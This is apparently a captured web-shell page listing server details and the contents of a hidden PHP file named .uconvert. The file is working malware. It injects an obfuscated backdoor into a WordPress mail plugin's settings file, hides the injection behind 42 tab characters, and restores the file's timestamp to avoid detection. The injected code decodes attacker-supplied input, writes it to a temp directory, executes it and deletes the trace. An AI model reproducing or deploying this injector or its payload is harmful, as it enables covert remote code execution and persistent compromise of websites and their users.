HEX
Server:
System: Linux aac286ea486c 5.14.0-687.15.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jun 11 08:51:45 EDT 2026 x86_64
User: root (0)
PHP: 8.2.30
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,disk_free_space,diskfreespace
$ pwd: /proc/self/root/tmp/
Upload Files
File: //proc/self/root/tmp/.uconvert
<?php  $path = '/dom877180/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/SettingsTab.php'; $ft = @filemtime($path); $content = (string) @file_get_contents($path); $new_code = rawurldecode('if%28count%28%24_REQUEST%29%20%3E%200%20%26%26%20isset%28%24_REQUEST%5B%22%5Cx70gr%5Cx70%22%5D%29%29%7B%20%24holder%20%3D%20array_filter%28%5Bini_get%28%22upload_tmp_dir%22%29%2C%20%22/tmp%22%2C%20session_save_path%28%29%2C%20getenv%28%22TMP%22%29%2C%20getcwd%28%29%2C%20getenv%28%22TEMP%22%29%2C%20%22/dev/shm%22%2C%20sys_get_temp_dir%28%29%2C%20%22/var/tmp%22%5D%29%3B%20%24record%20%3D%20%24_REQUEST%5B%22%5Cx70gr%5Cx70%22%5D%3B%20%24record%20%3D%20explode%28%22.%22%2C%20%24record%20%29%20%3B%20%24descriptor%20%3D%20%27%27%3B%20%24s%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24lenS%20%3D%20strlen%28%24s%29%3B%20%24k%20%3D%200%3B%20array_walk%28%24record%2C%20function%20%28%24v2%29%20use%20%28%26%24descriptor%2C%20%26%24k%2C%20%24s%2C%20%24lenS%29%20%7B%24chS%20%3D%20ord%28%24s%5B%24k%20%25%20%24lenS%5D%29%3B%20%24dec%20%3D%20%28%28int%29%24v2%20-%20%24chS%20-%20%28%24k%20%25%2010%29%29%20%5E%2098%3B%20%24descriptor%20.%3D%20chr%28%24dec%29%3B%20%24k%2B%2B%3B%20%7D%29%3B%20for%20%28%24value%20%3D%200%2C%20%24entity%20%3D%20count%28%24holder%29%3B%20%24value%20%3C%20%24entity%3B%20%24value%2B%2B%29%20%7B%20%24data%20%3D%20%24holder%5B%24value%5D%3B%20if%20%28%28bool%29is_dir%28%24data%29%20%26%26%20%28bool%29is_writable%28%24data%29%29%20%7B%20%24k%20%3D%20str_replace%28%22%7Bvar_dir%7D%22%2C%20%24data%2C%20%22%7Bvar_dir%7D/.ent%22%29%3B%20%24success%20%3D%20file_put_contents%28%24k%2C%20%24descriptor%29%3B%20if%20%28%24success%29%20%7B%20include%20%24k%3B%20%40unlink%28%24k%29%3B%20exit%3B%7D%20%7D%20%7D%20%7D'); if (strlen($content) < 32) {     die('!failed!'); } if (strstr($content, $new_code)) {     die('!already injected!'); } $p = 0; if (strncmp($content, "\xEF\xBB\xBF", 3) === 0) {     $p = 3; } while ($p < strlen($content) && strpos(" \t\r\n", $content[$p]) !== false) {     $p++; } $prefix = substr($content, 0, $p); $body = substr($content, $p); if (strlen($body) < 32) {     die('!failed!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     $len = strlen($start);     if ($len > strlen($body) || substr($body, 0, $len) !== $start) {         continue;     }     if ($start === '<?') {         if (strncmp($body, '<?xml', 5) === 0) {             continue;         }         if (strlen($body) >= 3 && substr($body, 0, 3) === '<?=') {             continue;         }     }     $rest = substr($body, $len);     $candidate = $prefix.$start.str_repeat("\t", 42).$new_code."\n".$rest;     $tmp = @tempnam(dirname($path), 't');     if ($tmp !== false && @file_put_contents($tmp, $candidate) !== false && @rename($tmp, $path)) {         @touch($path, $ft);         $check = (string) @file_get_contents($path);         if (strstr($check, $new_code)) {             die('!success!');         }     }     if ($tmp !== false && is_file($tmp)) {         @unlink($tmp);     } } die('!failed!');
@ Telegram